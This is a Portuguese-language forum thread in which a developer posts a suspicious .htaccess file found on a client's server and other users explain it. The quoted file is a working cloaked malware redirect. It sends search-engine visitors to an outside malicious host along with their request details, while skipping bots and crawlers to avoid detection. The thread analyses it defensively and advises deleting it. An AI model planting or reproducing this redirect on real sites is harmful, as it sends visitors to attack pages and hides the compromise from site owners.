Publicado em 2 de mar.

[Resolvido] O que esse .htaccess é capaz de fazer?

Pessoal, boa tarde.

Hoje estava subindo alguns arquivos para o servidor do meu cliente, e notei que tinha um arquivo .htaccess lá, achei estranho e baixei ele para ver, segue o conteudo:

exgocgkctswo

RewriteEngine On RewriteCond %{REQUEST_METHOD} ^GET$ RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?).$ [NC] RewriteCond %{HTTP_REFERER} !^.(q\=cache\:).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest\-Vulcan).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).$ [NC] RewriteCond %{HTTP_COOKIE} !^.xccgtswgokoe.$ RewriteCond %{HTTPS} ^off$ RewriteRule ^(.*)$ http://infernomag.com/cgi-bin/r.cgi?p=9004&i=033df6d5&j=320&m=aacf47c584e2cfbc08494cccb326b046&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME} [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]

exgocgkctswo

Então como ainda estou estudando sobre o assunto, gostaria de saber o que o código acima pode fazer, se pode prejudicar o servidor de alguma forma, deixar uma brecha para códigos maliciosos e por ai vai.

Se alguem puder me falar um pouco sobre o código acima eu fico grato.

Abrass

Discussão (6)

Entre ou cadastre-se para participar da discussão

Entrar Criar conta

quitZAUMMM· 11 de mar.

Dê uma lida: http://goo.gl/QyoSv

[]s

Bruno Augusto· 11 de mar.

quitZAUMMM,era pra abrir alguma coisa? Aqui apareceu um menu e a página em branco.

Talvez seria algum tópico em específico desse site né?

Bem, mesmo que você seja novo no assunto é fácil de interpretar, desde que você seja programador e conheça alguns termos usados.

REQUEST_METHOD é a forma como a página está sendo requisitada (GET< POST, PUT, DELETE...)

HTTP_REFERER é a página onde o usuário estava antes de acessar o site que tiver esse arquivo com essas regras.

HTTP_USER_AGENT não sei explicar direito o que seria, mas eu vejo ele como uma identificação do browser ou do mecanismo de acesso que está acessando o site.

HTTP_COOKIE acredito ser a presença de um cookie, mas não estou certo disso.

HTTPS, talvez seja a presença do certificado de segurança. Também não estou certo.

Enfim...

Veja que todas as entradas tem uma Expressão Regular na frente e que TODAS, exceto REQUEST_METHOD, o primeiro HTTP_REFERER e HTTP inicial com um ! (exclamação) que, em programação, normalmente significa negação de algo.

Ou seja, se dado valor (esquerda) não corresponder com as regras (direita), será incluído na "lista-branca" para executar o RewriteRule logo no final.

Viu que eu destaquei um termo acima? Então, todas essas regras foram cuidadosamente desenvolvidas para não serem executadas por bots ou webcrawlers e sim, apenas por usuários "reais", de requisições legítimas, visando mascarar as atividades visto que, os responsáveis por tais bots tem mais poder e conhecimento para fazer algo contra o criador desse htaccess.

Não sei você, mas só por essa última frase, a coisa começou a feder, não? :P

Então, extraindo a porção fixa da URL presente em RewriteRule http://infernomag.com/cgi-bin/r.cgi?p=9004&i=033df6d5&j=320&m=aacf47c584e2cfbc08494cccb326b046 e acessando manualmente pelo Firefox, recebemos uma mensagem de Página avaliada como foco de ataques!

Resumindo! Alguém ou alguma coisa enxertou (pe com X mesmo?) esse htaccess no site do seu cliente, para direcionar todas as requisições para essa outra URL maliciosa.

Agora, das duas uma:

Se o domínio do site do seu cliente NÃO É infernomag.com, delete esse arquivo imediatamente.

Se for, esteja ciente que esse tópico estará sendo encaminhado à Administração do Fórum pois caracteriza, de certa, forma, propagação de informações prejudiciais a quem dela usufruem.

quitZAUMMM· 13 de mar.

kkk bom não sei pq apareceu a página assim, segue link certo: http://tutorial.uolhost.com.br/index.php?p=resposta&res=525#rmcl

[]s

LCS· 13 de mar.

Santa tragédia Batman.... kkk O Google serve para que mesmo??

Francispansa· 14 de mar.

Obrigado pelas respostas.. Bom eu tinha uma ideia do que o arquivo poderia fazer, mas queria confirmar aqui caso estivesse enganado e pudesse ser uma coisa muito pior do que eu imaginava.

Sobre a questão do dominio do meu cliente Bruno, não é infernomag.com, fique tranquilo..

Realmente postei o conteudo do arquivo aqui para saber mais sobre ele e como realmente poderia me prejudicar.

Bom, mais uma vez obrigado pelas respostas..

quitZAUMMM· 16 de mar.

Opa :thumbsup: